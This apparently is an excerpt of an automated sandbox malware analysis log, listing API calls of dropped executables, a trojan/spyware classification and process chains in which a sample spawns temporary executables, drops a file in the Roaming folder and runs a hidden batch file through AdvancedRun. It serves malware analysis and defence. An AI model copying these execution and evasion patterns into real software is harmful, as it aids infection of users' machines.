Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B60A2 ZwQueryInformationFile, 22_2_6C0B60A2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02F0AE ZwSetInformationWorkerFactory, 22_2_6C02F0AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B0B0 ZwTraceControl, 22_2_6C04B0B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0318B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 22_2_6C0318B9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0070C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 22_2_6C0070C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0400C2 ZwAlertThreadByThreadId, 22_2_6C0400C2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0410D7 ZwOpenKey,ZwCreateKey, 22_2_6C0410D7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0498D0 ZwQueryAttributesFile, 22_2_6C0498D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A0D0 ZwCreateTimer2, 22_2_6C04A0D0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B60E9 ZwOpenKey,ZwClose,ZwClose, 22_2_6C0B60E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 22_2_6C0BE0E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 22_2_6C00B8F0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 22_2_6C0040FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049900 ZwOpenEvent, 22_2_6C049900
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0A5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 22_2_6C0A5100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049920 ZwDuplicateToken, 22_2_6C049920
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C09193B ZwRaiseException,ZwTerminateProcess, 22_2_6C09193B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A130 ZwCreateWaitCompletionPacket, 22_2_6C04A130
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF13B ZwOpenKey,ZwCreateKey, 22_2_6C0DF13B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 22_2_6C02B944
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 22_2_6C00F150
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B150 ZwUnsubscribeWnfStateChange, 22_2_6C04B150
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 22_2_6C00395E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B160 ZwUpdateWnfStateData, 22_2_6C04B160
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A160 ZwCreateWorkerFactory, 22_2_6C04A160
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8966
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 22_2_6C00B171
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D976 ZwCreateFile,ZwCreateFile, 22_2_6C03D976
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091976 ZwCreateEvent, 22_2_6C091976
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 22_2_6C02C182
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B180 ZwWaitForAlertByThreadId, 22_2_6C04B180
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049980 ZwCreateEvent, 22_2_6C049980
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A980 ZwQueryInstallUILanguage, 22_2_6C04A980
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 22_2_6C0CA189
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 22_2_6C0B6186
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049990 ZwQueryVolumeInformationFile, 22_2_6C049990
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6C00519E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B1A0 ZwWaitForKeyedEvent, 22_2_6C04B1A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A9B0 ZwQueryLicenseValue, 22_2_6C04A9B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 22_2_6C0DF1B5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 22_2_6C03C9BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0919C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 22_2_6C0919C8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F1E4 ZwEnumerateValueKey, 22_2_6C00F1E4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D89E7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E9ED RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlFreeHeap, 22_2_6C00E9ED
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049A00 ZwProtectVirtualMemory, 22_2_6C049A00
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E216 RtlInitUnicodeString,ZwOpenKey,ZwEnumerateKey,ZwClose, 22_2_6C00E216
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 22_2_6C0D8214
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 22_2_6C004A20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose, 22_2_6C094A28
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AA20 ZwQuerySecurityAttributesToken, 22_2_6C04AA20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 22_2_6C03B230
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049A30 ZwTerminateThread, 22_2_6C049A30
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 22_2_6C091242
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049A50 ZwCreateFile, 22_2_6C049A50
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8A62
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C022280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 22_2_6C022280
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04B280 ZwWow64DebuggerCall, 22_2_6C04B280
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 22_2_6C03DA88
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AA90 ZwQuerySystemInformationEx, 22_2_6C04AA90
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 22_2_6C03D294
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 22_2_6C00429E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 22_2_6C001AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00BAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose, 22_2_6C00BAA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 22_2_6C035AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049AB0 ZwWaitForMultipleObjects, 22_2_6C049AB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E2BB ZwWaitForAlertByThreadId, 22_2_6C03E2BB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AAC0 ZwQueryWnfStateNameInformation, 22_2_6C04AAC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8ADD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 22_2_6C02FAD0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C091AD6 ZwFreeVirtualMemory, 22_2_6C091AD6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BEAE9 memset,RtlInitUnicodeString,RtlInitUnicodeString,ZwEnumerateValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings, 22_2_6C0BEAE9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049AE0 ZwTraceEvent, 22_2_6C049AE0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AAE0 ZwRaiseException, 22_2_6C04AAE0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 22_2_6C004B00
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049B00 ZwSetValueKey, 22_2_6C049B00
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035306 ZwReleaseKeyedEvent, 22_2_6C035306
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C131B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009335 ZwClose,ZwClose, 22_2_6C009335
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B48 ZwClose,ZwClose, 22_2_6C033B48
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8B58
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 22_2_6C0B6369
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AB60 ZwReleaseKeyedEvent, 22_2_6C04AB60
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C016B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 22_2_6C016B6B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 22_2_6C096365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C087365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 22_2_6C087365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04AB70 ZwReleaseWorkerFactoryWorker, 22_2_6C04AB70
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 22_2_6C033B7A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C098372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 22_2_6C098372
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002B7E ZwSetInformationThread,ZwClose, 22_2_6C002B7E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C138A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 22_2_6C002B93
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A390 ZwGetCachedSigningLevel, 22_2_6C04A390
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 22_2_6C03939F
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04A3A0 ZwGetCompleteWnfStateSubscription, 22_2_6C04A3A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0C1BA8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 22_2_6C034BAD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D9BBE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6C0D8BB6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 22_2_6C002BC2
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 22_2_6C01A3E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049BF0 ZwAlertThreadByThreadId, 22_2_6C049BF0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0023F6 ZwClose,RtlFreeHeap, 22_2_6C0023F6
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401915 Sleep,NtTerminateProcess, 27_2_00401915
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402040 NtQuerySystemInformation, 27_2_00402040
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402242 NtQuerySystemInformation, 27_2_00402242
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402313 NtOpenKey, 27_2_00402313
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401921 Sleep,NtTerminateProcess, 27_2_00401921
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401931 Sleep,NtTerminateProcess, 27_2_00401931
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402535 NtEnumerateKey, 27_2_00402535
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401938 Sleep,NtTerminateProcess, 27_2_00401938
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401FD8 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation, 27_2_00401FD8
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401FFE NtQuerySystemInformation,LocalAlloc, 27_2_00401FFE
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00402190 NtQuerySystemInformation, 27_2_00402190
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_00401493 NtAllocateVirtualMemory, 27_2_00401493
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_0040199B Sleep,NtTerminateProcess, 27_2_0040199B
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_004021B5 NtQuerySystemInformation, 27_2_004021B5
Source: 37D8.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 4EDC.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3AE.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C651.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: B74C.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: E4D7.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FC0C.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FBAD.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: DAA6.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: csdfufc.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: y8WngeDn4q.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\esdfufc Jump to behavior
Source: 1105.tmp.22.dr Binary string: \Device\IPT
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@43/42@60/11
Source: C:\Users\user\AppData\Local\Temp\37D8.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306
Source: y8WngeDn4q.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 25_2_0040A33B
Source: y8WngeDn4q.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe'
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe
Source: C:\Users\user\AppData\Roaming\esdfufc Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc
Source: C:\Users\user\AppData\Local\Temp\8908.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\37D8.exe C:\Users\user\AppData\Local\Temp\37D8.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3FD8.exe C:\Users\user\AppData\Local\Temp\3FD8.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4EDC.exe C:\Users\user\AppData\Local\Temp\4EDC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\60DF.exe C:\Users\user\AppData\Local\Temp\60DF.exe
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6E1E.exe C:\Users\user\AppData\Local\Temp\6E1E.exe
